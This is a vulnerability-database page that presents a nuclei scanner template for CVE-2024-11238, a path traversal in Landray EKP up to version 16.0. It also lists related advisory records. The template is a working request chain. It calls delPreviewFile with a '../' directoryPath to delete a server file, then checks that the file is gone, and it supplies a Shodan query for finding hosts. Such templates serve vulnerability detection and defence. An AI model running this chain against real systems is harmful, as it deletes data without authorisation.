Lucene search
K

Landray EKP - Path Traversal

🗓️ 07 Jul 2026 03:01:27Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 21 Views

Remote path traversal in Landray EKP up to version 16.0 may disclose arbitrary files.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2024-11238
15 Nov 202414:56
circl
CNNVD
Landray EKP 路径遍历漏洞
15 Nov 202400:00
cnnvd
CVE
CVE-2024-11238
15 Nov 202412:31
cve
Cvelist
CVE-2024-11238 Landray EKP sysUiComponent.do delPreviewFile path traversal
15 Nov 202412:31
cvelist
EUVD
EUVD-2024-33695
3 Oct 202520:07
euvd
NVD
CVE-2024-11238
15 Nov 202413:15
nvd
OSV
CVE-2024-11238
15 Nov 202413:15
osv
Positive Technologies
PT-2024-16847 · Landray · Landray Ekp
15 Nov 202400:00
ptsecurity
RedhatCVE
CVE-2024-11238
23 May 202506:33
redhatcve
VulnCheck KEV
VulnCheck KEV: CVE-2024-11238
9 May 202500:00
vulncheck_kev
Rows per page
id: CVE-2024-11238

info:
  name: Landray EKP - Path Traversal
  author: theamanrawat
  severity: medium
  description: |
    A vulnerability, which was classified as critical, was found in Landray EKP up to 16.0. This affects the function delPreviewFile of the file /sys/ui/sys_ui_component/sysUiComponent.do?method=delPreviewFile. The manipulation of the argument directoryPath leads to path traversal. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
  impact: |
    Remote attackers can access arbitrary files on the server, potentially leading to information disclosure or system compromise.
  remediation: |
    Update to the latest version that addresses this vulnerability or apply appropriate patches.
  reference:
    - https://github.com/CoinIsMoney/TempGuide/blob/main/LL-exp-02.pdf
    - https://nvd.nist.gov/vuln/detail/CVE-2024-11238
    - https://vuldb.com/?ctiid.284673
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L
    cvss-score: 6.5
    cve-id: CVE-2024-11238
    cwe-id: CWE-22
    epss-score: 0.05597
    epss-percentile: 0.91969
    cpe: cpe:2.3:a:landray:landray_ekp:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    vendor: landray
    product: landray_ekp
    shodan-query: http.favicon.hash:831854882
  tags: cve,cve2024,lfi,intrusive,vkev

flow: http(1) && http(2) && http(3) && http(4)

http:
  - raw:
      - |
        GET /login.jsp HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
        internal: true

    extractors:
      - type: regex
        part: body
        name: faviconPath
        internal: true
        group: 1
        regex:
          - 'href="/resource/(.*?)/favicon.ico"'

  - raw:
      - |
        GET /resource/{{faviconPath}}/favicon.ico HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
        internal: true

  - raw:
      - |
        GET /sys/ui/sys_ui_component/sysUiComponent.do?method=delPreviewFile&directoryPath=../{{faviconPath}}/ HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - content_length == 0
        condition: and
        internal: true

  - raw:
      - |
        GET /resource/{{faviconPath}}/favicon.ico HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 404
# digest: 4a0a00473045022025d21f7bbff42ff019618203f9a887df412a470469d0ef748be0ff0e8a06b93c02210083f4a5a880894fce79a931a42e9a7ed841a56dec86ef434c836a4eefbd55748d:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
5.9Medium risk
Vulners AI Score5.9
CVSS 3.15.3 - 6.5
CVSS 26.4
CVSS 46.9
CVSS 36.5
EPSS0.05597
SSVC
21